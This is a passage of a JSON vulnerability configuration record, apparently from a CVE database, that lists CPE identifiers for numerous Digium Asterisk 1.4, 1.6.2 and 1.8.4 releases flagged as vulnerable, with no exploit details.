              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1DCECA72-533A-4A95-AB19-20C5F09A1B01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0E2309F8-AFEE-4150-99D1-BA606432ED73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7785F282-BFA0-400A-8398-872ACCA4BF37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1278D3FB-78C6-4F7D-A845-0A93D4F6E2B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C00A6EFB-A848-46D3-AAD7-FD8140007E42",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F8B700A-FACB-4BC8-9DF2-972DC63D852B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "FFD31B9B-2F43-4637-BE56-47A807384BF3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "E6450D6B-C907-49E6-9788-E4029C09285F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "DDB0432E-024A-4C0C-87FF-448E513D2834",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "D6A6A343-FEA2-49E5-9858-455AE3B29470",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "D57B94E3-EA37-466C-ADC4-5180D4502FDD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc7:*:*:*:*:*:*",
              "matchCriteriaId": "64D35A89-6B21-4770-AA0F-424C5C91A254",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc8:*:*:*:*:*:*",
              "matchCriteriaId": "14817302-A34A-4980-B148-AEB4B3B49BE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "61FDFA96-E62A-413B-9846-F51F1F7349EC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DA924386-49F6-4371-B975-B1473EEA12F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B74A1B99-8901-4690-B994-1DAD3EFA5ABB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4253C7DD-3588-4B35-B96D-C027133BE93F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "24AE11DB-16D3-42BF-BC64-E8982107D35B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "53841D77-926C-4362-BC85-BD8B6AC4391D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "F98FD6E6-EDE9-437D-B7C2-2DB65B73D230",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "4BA6CA77-D358-4623-8400-78EFC47ADB7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B4E62DAB-45E0-4EAA-8E45-6D3757A679D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.15:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1355578C-B384-401A-9123-2789CBECAD0B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "3491F8DB-A162-4608-B5F9-5401FE058CEB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C52730A8-D96E-46C1-8905-1D78A93E9C84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6E5CD17-B14A-4BDB-BA75-261344FF6F25",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "63C8DBF5-6992-4618-BD2D-56F1F98EAE3C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEED6C07-CFB7-44DC-9A41-9B6271942123",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0864DAF9-B7FA-4018-99F4-F2A7AA6FBBB0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "694B257B-E73B-4534-B316-87284FA45534",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "418FD91F-014E-4529-8D72-D3FB27788EEA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "D213EC93-0D4F-4BD9-9F13-9A9E705135EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E9D2091-B292-4D6E-A91F-58D24BD5A5E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "CFF196A0-87E1-4DD2-8CDA-B19EB6F71312",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F59B7C5-8EF3-495E-9A91-9C96E6DF41E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.18:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D9020FF4-645B-4E98-8CB0-3F8DF7C5841B",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E56DB29-571D-4615-B347-38CF4590E463",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "FC1188DA-6C27-48D2-9CE7-74D77B24EE9E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "A93B8F91-5C56-44DE-AE29-8468E853759F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "BF7F4D02-7C8E-403C-A53E-A5F8C07F33A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "D85031A3-3444-4650-905D-721F1EBAA24F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F0AC2B3-6E8A-4B26-8A6C-792D9E5072C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2BC8D6D4-A389-4A78-8DA8-351A9CB896E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E979AC4-58EA-4297-9F90-350924BBE440",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A58CCD3-4A0C-468B-85F2-59A52B7293A4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "3542DB91-8487-49D6-AA15-E8FD9D6B99D6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "6BA4F3F1-C3F1-4E15-A854-9BB84E33E4AB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "661D710E-79F0-4E98-B35B-ED0549D35C24",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "68291ADE-F9D1-427B-B150-FDA7F2F4788B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "7F80CBCB-F58D-4BE7-8E78-67E04C900D01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB61D32E-3400-480E-BD27-BA3F98F94427",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "D9154EDB-CAE6-4BB0-8D02-9EC2B81D93C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A432B0A7-F158-4B9C-97F6-6A29DB13EAFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "687C67CB-46AF-40C2-8A02-081C7F78568A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E8D6EC0-A61E-4DBC-A0C7-864E9C4BDA1A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "2EF7F65A-45FD-4586-901E-49B057100BB4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "300F158E-ED27-46C8-85E4-AA0AA6B201DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB6F04C0-3226-4D2C-97A3-39999483C62C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "30685A20-963A-48D4-B7D7-2C11C2C812AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "C54C3AAC-4D5D-4661-86AB-6849982E8C67",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F847916-89F1-4AA6-973D-6002C8B54EE8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "5359815E-671A-4DFD-9E99-8CF903A03C84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "E2EFBC9E-4DCA-43CB-93EB-6807E2383A98",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "98755B1B-CAD5-4AC5-8571-52E67C3A8274",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "C9D8C8FE-3D09-4F60-AD03-9D4439942141",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "902FBE4B-5237-43CD-8EB6-D2CAC0F30879",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "708DCACA-49EC-468D-81EC-CE5367F8A164",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "BA9E3314-7D23-414C-8187-16D807410B62",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D824ED7B-BAB6-4C0F-A6B0-A75AB072EC0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7A01CE63-F834-48B2-826D-2DAD1B4AE8C3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "88B9CC9D-3DC2-4674-BA52-4C6D4E2056C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "43F1849F-1230-45E7-B6A3-D6FC72EB0F11",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "873C9C7E-93A3-4269-B19C-AB33A21C1AC7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "457F2112-7C5E-4953-8F4C-117925D486DA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "BD15ADD6-D7FA-441A-A9BC-487BCC15F2A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "792A8901-B7B8-40E8-9258-6338B72770FD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "0E6C8F78-0C00-45A5-8FEB-2A4BD5AC1A37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F3E04247-C4EF-4C1B-B879-5C02986950D3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5E382FC8-4001-4058-9151-05AE98B4A35E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "11FECE6B-B6A6-4DDA-9019-9A10B05EC1F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "D9813D27-0688-4989-99EB-1DC0F82D59F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:*:*:*:*:*:*:*",
              "matchCriteriaId": "D4333904-9D21-4149-965F-F49F0A34BD85",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F7180626-F0FD-46F3-AD52-5C67525C4B46",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "85A1E3A3-C157-4F3D-9477-F63771E7F627",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "FEE739CC-7A9C-489E-BFC0-6257129C043D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "ADC0E947-A95A-44ED-8DED-CC769FF00569",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "DE52BD9F-3728-455C-BC45-1A4DB926FFE9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1EF82D41-9222-42D3-ADAD-94B4F950C63F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2AE9F181-A8E4-4700-A30F-211CDE251606",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B10AE4B-EC2D-4D5B-B842-50F5097A0650",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "83E854D0-17A2-473B-B7E8-41E6447C81DC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "47169133-3854-4D8F-B79E-3CC77A166EF0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "6071601F-CF37-4E66-9D6D-AFC3434C18AB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "2A575824-E005-4820-824A-4875594619E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "080C7089-5662-4A94-9842-C4A26095DA4B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7AE38697-0B16-4032-9234-CA263E4A9885",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24:*:*:*:*:*:*:*",
              "matchCriteriaId": "DCB18BE2-B073-429C-ABE7-B8305793DAE4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FA7216BA-A42F-4ED8-8086-B4FA483FDAB6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB7D2048-CD61-46C0-830B-11976B275783",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25:*:*:*:*:*:*:*",
              "matchCriteriaId": "8DBA63FE-62AF-4F3D-B30C-550D17C4E35F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AD0A0F19-020D-4578-9023-12B0CB646D9C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "96D5A1E3-FF0B-4C71-AA51-655D7106880D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:*:*:*:*:*:*:*",
              "matchCriteriaId": "E5D425E6-E2E5-4452-9EAA-2697C1155784",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9855FA26-0930-4AC9-A920-B394F6916349",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BBA21246-7DF4-41BC-998A-05D38FC97C8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EE9A7984-22C9-4296-8E44-C010E67F193D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "51B2C42A-C252-4BD8-A908-8F30C2BF15E7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "2137CEAD-0F19-43C5-A26D-1972564FCD8C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "B7552466-B782-4F16-8561-A2A51E94FED4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C2F8C82D-3031-4C62-89FA-3BF56EA29727",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3074CEA-46BD-4CAD-BF5C-10008A80E434",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6AB8988-FCC6-407A-A7D9-2F7A3A7488B1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:*:*:*:*:*:*:*",
              "matchCriteriaId": "E06848DE-6EE1-4FD0-A14F-39D41B2F3E75",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CF342950-FDD7-41A9-94D5-EDF41130B61E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6E4543AA-3D54-4444-AD1F-381A87A89DA2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "AF3036DD-261C-4975-A01E-92CD29479588",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "EF07C116-27DC-4875-9DCF-049E2A8EAEA4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "88FBC328-538A-4484-A342-1688D9669B9F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "CBF2301E-F6EF-4D28-82EE-FA1AB8CA9E43",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.28:*:*:*:*:*:*:*",
              "matchCriteriaId": "A53F637C-846A-43FC-BA71-C8571648FA46",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.28:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "E61070F4-1B6B-4814-918E-459DE5119A24",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.29:*:*:*:*:*:*:*",
              "matchCriteriaId": "70664E0F-09CF-42C2-A7A7-E635D022E90D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.29:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D1E13E1A-C2D4-4E5A-84C8-E6AF061D67C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.29.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7E811134-B657-4C50-9AEF-A7F68CA5577A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.30:*:*:*:*:*:*:*",
              "matchCriteriaId": "4C4CD101-F079-4940-AA79-886B69A7A514",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.30:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B7B828E9-5BE3-4E6F-8048-F2B1F2E929CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.30:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "75BB2066-74A6-4F89-B54C-35F234DC1F03",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.31:*:*:*:*:*:*:*",
              "matchCriteriaId": "FE522334-BF53-4E34-949B-CD928B59A341",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.31:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "648DEC0E-3CBC-4EA2-AF27-2C518B0762CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.31:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B50F4BAE-D00D-4352-B52B-BE1A9FFB6949",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.32:*:*:*:*:*:*:*",
              "matchCriteriaId": "E7A35508-8235-4915-8810-12B2630C82C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.32:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "63DD4EE5-6F56-41C7-9CB4-16ADF4F63B8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33:*:*:*:*:*:*:*",
              "matchCriteriaId": "2347E451-2F89-4EA6-A6E0-22BCB0C8A56E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A86F5360-6FE4-4EA2-9208-076E78C842A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "3CDFA85B-17A4-4ECC-9922-F5546917B4C0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3D7D7DB7-32A7-490E-AED2-C404D371E7C2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.34:*:*:*:*:*:*:*",
              "matchCriteriaId": "A03632BC-CA0F-42BD-8839-A72DB146A4A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.34:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9DC4EF64-6A1D-47CB-AC07-48CABB612DCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.34:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "68C00FEF-7850-48F4-8122-4211D080B508",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.35:*:*:*:*:*:*:*",
              "matchCriteriaId": "D3A48F07-42E1-47E9-94EA-44D20A0BAC3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.35:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87D16470-5892-4289-BB35-B69100BCA31E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.36:*:*:*:*:*:*:*",
              "matchCriteriaId": "15E71BD7-83D1-4E2B-AD40-BB6B53056C89",
              "vulnerable": true
            },
            {
